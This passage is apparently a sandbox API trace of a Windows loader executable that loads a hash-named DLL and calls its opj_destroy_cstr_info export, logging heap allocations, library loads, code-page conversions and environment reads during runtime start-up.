0x4a4c70 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c) returned 0x4ab7a0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd2) returned 0x4a5cd0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x7c) returned 0x4a4000 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3a) returned 0x4b09f0 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x90) returned 0x4a3c20 [0175.396] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab980 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x30) returned 0x4a49e0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x36) returned 0x4a5ab0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b0770 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x52) returned 0x4a8f60 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b0950 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd6) returned 0x4a5610 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4a20d0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab2f0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a2110 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x54) returned 0x4a9200 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x52) returned 0x4a9320 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab4d0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x42) returned 0x4b0ae0 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4a2150 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x44) returned 0x4b0b30 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab2c0 [0175.397] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5060 | out: hHeap=0x4a0000) returned 1 [0175.397] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1000) returned 0x4b4680 [0175.397] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0175.397] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0175.397] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" [0175.398] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x4a9770*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0175.399] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0175.403] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.403] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0175.403] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.403] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0175.403] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0175.404] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.404] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0175.405] GetProcessHeap () returned 0x4a0000 [0175.405] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.405] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0175.405] GetLastError () returned 0x0 [0175.405] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0175.405] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0175.405] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c8) returned 0x4b5b10 [0175.405] SetLastError (dwErrCode=0x0) [0175.405] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1200) returned 0x4b5ee0 [0175.407] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0175.407] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0175.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0175.407] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0175.407] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" [0175.407] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info" [0175.407] GetACP () returned 0x4e4 [0175.407] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x228) returned 0x4aaca0 [0175.407] IsValidCodePage (CodePage=0x4e4) returned 1 [0175.407] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0175.407] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0175.408] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0175.408] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0175.408] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0175.408] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0175.408] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0175.408] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0175.408] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0175.408] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0175.408] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0175.408] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0175.408] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0175.409] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1000) returned 0x4b70f0 [0175.409] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0175.409] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0175.409] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0175.410] AreFileApisANSI () returned 1 [0175.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0175.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xcf) returned 0x4a4860 [0175.410] GetEnvironmentStringsW () returned 0x4b8100* [0175.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4e6) returned 0x4b8ae0 [0175.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x4b8ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0175.410] FreeEnvironmentStringsW (penv=0x4b8100) returned 1 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x118) returned 0x4a9ed0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1f) returned 0x4ab9e0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2e) returned 0x4a4fa0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a4fe0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3c) returned 0x4b0540 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a5020 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x14) returned 0x4a5060 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x24) returned 0x4ab440 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xd) returned 0x4a3fb0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1d) returned 0x4ab290 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x31) returned 0x4a3eb0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x15) returned 0x4a9900 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x17) returned 0x4a4090 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0xe) returned 0x4a25f0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x69) returned 0x4a3ef0 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x3e) returned 0x4b0720 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1d) returned 0x4ab620 [0175.410] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x48) returned 0x4b0cc0 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x12) returned 0x4a3f70 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4aba20 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1b) returned 0x4ab320 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab5c0 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x29) returned 0x4aba40 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1e) returned 0x4ab6b0 [0175.411] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x6b) returned 0x4aba80 